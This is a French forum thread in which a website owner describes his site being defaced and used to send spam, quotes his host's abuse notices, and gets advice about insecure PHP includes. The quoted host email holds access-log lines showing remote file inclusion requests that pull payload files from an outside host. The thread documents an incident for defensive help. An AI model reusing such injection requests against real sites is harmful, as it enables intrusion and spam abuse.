Piratage de mon site [Fermé]

Signaler
-
 Samuel -
Bonjour,
J'ai été victime du piratage de mon site, ce matin, il affichait une page internet, comme quoi il a été hacké par la "Turk Attack team". J'ai donc remplacé cette page index, par l'ancienne. Le site a pu repartir.
Ensuite, j'ai cherché sur internet comment sécurisé mon site, j'ai trouvé quelques trucs, (notamment au niveau du .htaccess), que j'ai appliqué.
Ce soir, mon site n'est plus accessible, car mon hébergeur vient de bloquer tout accès, une page 403 est donc visible lorsque je me rends sur mon site.
Mon hébergeur (1and1) me demande de remédier aux problèmes dans mes scripts, mais je n'ai plus accès en FTP à mon site ...
Bref, ils m'ont envoyé un mail m'indiquant :

----

Depuis notre dernier courrier, nous avons reçu de nouvelles plaintes concernant
l'envoi de spam à partir de votre espace web 1&1.

L'envoi de spam représentant un danger imminent pour notre infrastructure, votre
espace web sera bloqué suite à ce message.

Pour le débloquer, veuillez nous faire part des délais dans lesquels vous saurez
vous adresser au problème. Pour ce faire, merci de répondre à cet email en
laissant notre référence REF dans votre message.

Dans le cas où l'envoi de spam a été extrêmement massif, ce message peu avoir
été envoyé très peu de temps après notre première notification. Dans ce cas,
nous regrettons que vous n'auriez pas eu le temps de trouver solution au
problème et éviter le blocage. Toutefois, le blocage est indispensable pour la
protection de notre infrastructure.

----

Puis un autre :

----

Mes collègues de notre division " Administration Serveurs " nous
informent qu'un script non sécurisé fût détecté sur votre compte client
***.

root@infong11:/kunden/homepages/1/d145180228/htdocs# chmod -v 000
license.php perl.pl errors.php
mode of `license.php' changed to 0000 (---------)
mode of `perl.pl' changed to 0000 (---------)
mode of `errors.php' changed to 0000 (---------)
root@infong11:/kunden/homepages/1/d145180228/htdocs# ln -sv
/usr/lib/php.ini-nourl php.ini
create symbolic link `php.ini' to `/usr/lib/php.ini-nourl'

151.66.131.59 - - [27/Jan/2009:11:20:28 +0100] "GET
//?page=http://ks27457.myhostlife.org/evil.txt2?? HTTP/1.1" 200 3309
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
151.66.131.59 - - [27/Jan/2009:11:22:34 +0100] "GET
//?page=http://ks27457.myhostlife.org/spread.txt?? HTTP/1.1" 200 3329
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"

Vous êtes invité à sécuriser le plus rapidement possible ce script, il
est déjà possible que ce dernier soit suspendu suivant le risque que ce
dernier représenterait.

Nous vous remercions pour votre compréhension et votre collaboration au
traitement de cette alerte.

----

Le problème c'est que je n'y comprends pas grand chose dans ces lignes. Je sais simplement qu'un script a du envoyé massivement du spam, mais pour le second mail, je ne sais pas quoi faire.

Quelqu'un pourrait m'aider s'il vous plait ?

6 réponses

Messages postés
277
Date d'inscription
lundi 14 février 2005
Statut
Membre
Dernière intervention
14 août 2009
39
a Mon avis il a un problème au niveau de la fonction include
1
Merci

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 73420 internautes nous ont dit merci ce mois-ci

Messages postés
974
Date d'inscription
lundi 10 novembre 2008
Statut
Membre
Dernière intervention
3 mars 2014
73
salut Samuel,

j'espère que tu as trouvé des solutions sinon certaines sont très certainement sur ce site:

https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql/914663-tp-un-mini-chat#ss_part_1

pour les questions de "sécurité de base" la page que je viens de te donner sera certainement très intéressante pour toi ou les autres dans ton cas et vous ne risquez pas de perdre votre temps à la lire.

voilà le Sam !

ps: si tu as trouvé une solution merci de l'indiquer pour les autres qui serait dans ton cas ;)
1
Merci

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 73420 internautes nous ont dit merci ce mois-ci

J'ai trouvé des solutions pas mal sur ce site :
https://forum.ovh.com/showthread.php/19263

Mais je n'ai toujours pas accès à mon FTP et je pense que je vais devoir attendre Lundi, puisqu'ils ne doivent pas travailler le WE !
Merci beaucou pour vos réponses !
Messages postés
277
Date d'inscription
lundi 14 février 2005
Statut
Membre
Dernière intervention
14 août 2009
39
Faut leur demander de rentre l'accès FTP afin que tu puisse régler ton problème
Messages postés
260
Date d'inscription
jeudi 8 janvier 2009
Statut
Membre
Dernière intervention
6 avril 2009
7
Oui effectivement, il faut que tuai accès au moins au FTP, quel type de script utilise tu, fait maison ou autre
Messages postés
260
Date d'inscription
jeudi 8 janvier 2009
Statut
Membre
Dernière intervention
6 avril 2009
7
J'en ai un qui se fait pirater 1 fois tout les deux mois, j'ai pas eu le temps de faire les mises à jour de sécurité....
Messages postés
553
Date d'inscription
lundi 5 novembre 2007
Statut
Membre
Dernière intervention
9 juillet 2013
119
Grace a un include, on peut malheuresement tou faire, y injecter un code, permettant par exemple d'envoyer des mail a tout va...
Remédi a ce probleme avec les includes !